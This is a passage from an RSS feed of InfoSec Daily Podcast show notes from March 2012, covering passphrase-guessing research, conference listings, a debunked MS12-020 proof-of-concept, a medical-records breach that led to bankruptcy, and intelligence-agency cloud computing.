style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Urban Dictionary</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. We found about 8,000 phrases using a 20,000 phrase dictionary. Using a very rough estimate for the total number of phrases and some probability calculations, this produced an estimate that passphrase distribution provides only about 20 bits of security against an attacker trying to compromise 1% of available accounts. This is far better than passwords, which are usually under 10 bits by this same metric, but not high enough to make online guessing impractical without proper rate-limiting. Curiously, it&rsquo;s close to estimates made using Kuo et al.&rsquo;s published numbers on mnemonic phrases. It also shows that significant numbers of people will blatantly ignore security advice about choosing nonsense phrases and choose things like &ldquo;Manchester United&rdquo; or &ldquo;Harry Potter.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After this experiment, we did a few experiments to test the linguistic properties of phrases by generating potential phrases according to their distribution in large linguistic corpora (we used the</span><a href="http://sara.natcorp.ox.ac.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">British National Corpus</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://www.ldc.upenn.edu/Catalog/catalogEntry.jsp?catalogId=LDC2009T25"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Google n-gram corpus</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">). Some clear trends emerged&mdash;people strongly prefer phrases which are either a single modified noun (&ldquo;operation room&rdquo;) or a single modified verb (&ldquo;send immediately&rdquo;). These phrases are perhaps easier to remember than phrases which include a verb and a noun and are therefore closer to a complete sentence. Within these categories, users don&rsquo;t stray too far from choosing two-word phrases the way they&rsquo;re actually produced in natural language. That is, phrases like &ldquo;young man&rdquo; which come up often in speech are proportionately more likely to be chosen than rare phrases like &ldquo;young table.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-620-fake-ms12-020-pattern-stump-opera-malware-and-multiword-passwords/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3642/0/infosec-daily-podcast-episode-620.mp3" length="19703518" type="audio/mpeg" />
		<itunes:duration>0:41:00</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 620 for March 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	h[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 620 for March 15, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 2012
When: April 20-22, 2012
	Where: Atlanta, GA
	http://www.outerz0ne.org
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://pastebin.com/jZt9gmD5
Source: http://pastebin.com/fFWkezQH
Source: http://www.9170.org/post-421.html
There are currently three, possibly more, PoC examples for MS12-020 that are floating around. &#160;When you look at these you&#8217;ll notice first that they were supposedly coded by &#8216;sabu@fbi.gov&#8217; and that they require FreeRDP for the code to function. &#160;This is not surprising since it&#8217;s an RDP vulnerability that we&#8217;re looking to exploit. &#160;The problem comes when you try to utilize a python module named freerdp. 
	
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import &#160;rdpNego
&#160;
It might not surprise you to learn that there is no freerdp module included with FreeRDP, so we reached out to the developers of the FreeRDP project, nice work BTW, to see if they could confirmed the existance of a FreeRDP module for Python. &#160;According to FreeRDP developer Marc-Andr&#233; Moreau, there is no known freerdp python module. &#160;There has never been any reason to write one since FreeRDP wouldn&#8217;t be usable from within Python. &#160;Therefore when you combine the fact that this module is required along with the shell code from the MS08-067 exploit, but interestingly a completely different (and significantly larger) payload. &#160;There are some undeniable similarity between the PoC and the MS08-067 exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/31874.py. &#160;Also the &#8216;payload&#8217; is strikingly similar to an apache exploit: http://www.chroot.org/exploits/chroot_uu_011.
It has been confirmed that a working PoC has been confirmed to cause a blue screen on a patched to ms11-065 &#160;Windows XP SP3. &#160;There are currently efforts ongoing to fully understand why the crash is occurring. &#160;Determine methods for getting a crash reliably &#160;(currently the PoC doesn&#39;t always cause a crash). &#160;Craft an open source version of the trigg[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 619 &#8211; Breach2Collapse, Spying Clouds, MS12-020, Not Human and Anonymous OS</title>
		<link>http://www.isdpodcast.com/episode-619-breach2collapse-spying-clouds-ms12-020-not-human-and-anonymous-os</link>
		<comments>http://www.isdpodcast.com/episode-619-breach2collapse-spying-clouds-ms12-020-not-human-and-anonymous-os#comments</comments>
		<pubDate>Thu, 15 Mar 2012 00:45:32 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3638</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 619 for March 14, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan. &#160; Announcements: InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Linuxfest Northwest 2012 When: Saturday, April 28th-29th, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: May 21-25, 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 619 for March 14, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">March 30-April 1<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">May 21-25, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	When:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> May 26-27, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	When:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training<br class="kix-line-break" /><br />
	When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">July 21-24, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> August 20-24, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	When:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	When: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;</span><a href="http://blogs.wsj.com/bankruptcy/2012/03/12/burglary-triggers-medical-records-firm%E2%80%99s-collapse/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.wsj.com/bankruptcy/2012/03/12/burglary-triggers-medical-records-firm%E2%80%99s-collapse/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Impairment Resources LLC filed for bankruptcy Friday after the break-in at its San Diego headquarters led to the electronic escape of detailed medical information for roughly 14,000 people, according to papers filed in U.S. Bankruptcy Court in Wilmington, Del. That information included patient addresses, social security numbers and medical diagnoses.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police never caught the criminals, and company executives were required by law to report the breach to state attorneys general and the Department of Labor&rsquo;s Office of Inspector General. Some of those agencies, including the Department of Labor, are still investigating the matter, the company said in court papers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The cost of dealing with the breach was prohibitive&rdquo; for the company, Impairment Resources said when explaining its decision to file for Chapter 7 bankruptcy protection. That type of bankruptcy is used most often by companies to shut down and sell off what&rsquo;s left to pay off their debts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company said its assets are worth about $226,000, an amount that, even after money trickles in from liquidating sales, likely won&rsquo;t be enough to pay lender Insurance Recovery Group and its $583,000 loan, Impairment Resources said in court papers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company also faced the threat of even more debt with customers and individuals threatening to sue it over the privacy breach.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.nextgov.com/nextgov/ng_20120313_1694.php"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nextgov.com/nextgov/ng_20120313_1694.php</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">By sharing national security intelligence through the cloud, the government can modulate the classification level of information and who has permission to see the data, a Pentagon intelligence official said Wednesday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While some federal agencies shy away from cloud computing for fear of losing control over their data, the intelligence community and military increasingly are turning to networked services expressly to exert tighter security restraints.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We have nobs to turn that actually give us much more fidelity,&quot; said Jim Heath, National Security Agency senior science adviser, at an event organized by Nextgov&#39;s sister publication Government Executive and the Intelligence and National Security Alliance. Pentagon leaders have said a cloud environment will let the Defense Department remotely secure its separate systems, creating a uniform level of security across all the military&#39;s electronics.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In remote regions that are offline, where there is data to be analyzed but no Internet access, the cloud could one day be reachable through satellite connections, Terry Roberts, an executive director at Carnegie Mellon University&#39;s Software Engineering Institute, said in an interview. The cloud here refers to computing resources that are managed remotely for multiple users to ease collaboration and cut costs through economies of scale.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies such as ViaSat are working to combine their satellite communications services with massive data processing systems, such as Amazon&#39;s Web services, to support analysts in areas that are off the grid, including parts of the Middle East and the middle of an ocean.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It allows you to access satellite frequency much cheaper,&quot; said Roberts, former deputy director of naval intelligence for Defense.</span></p>
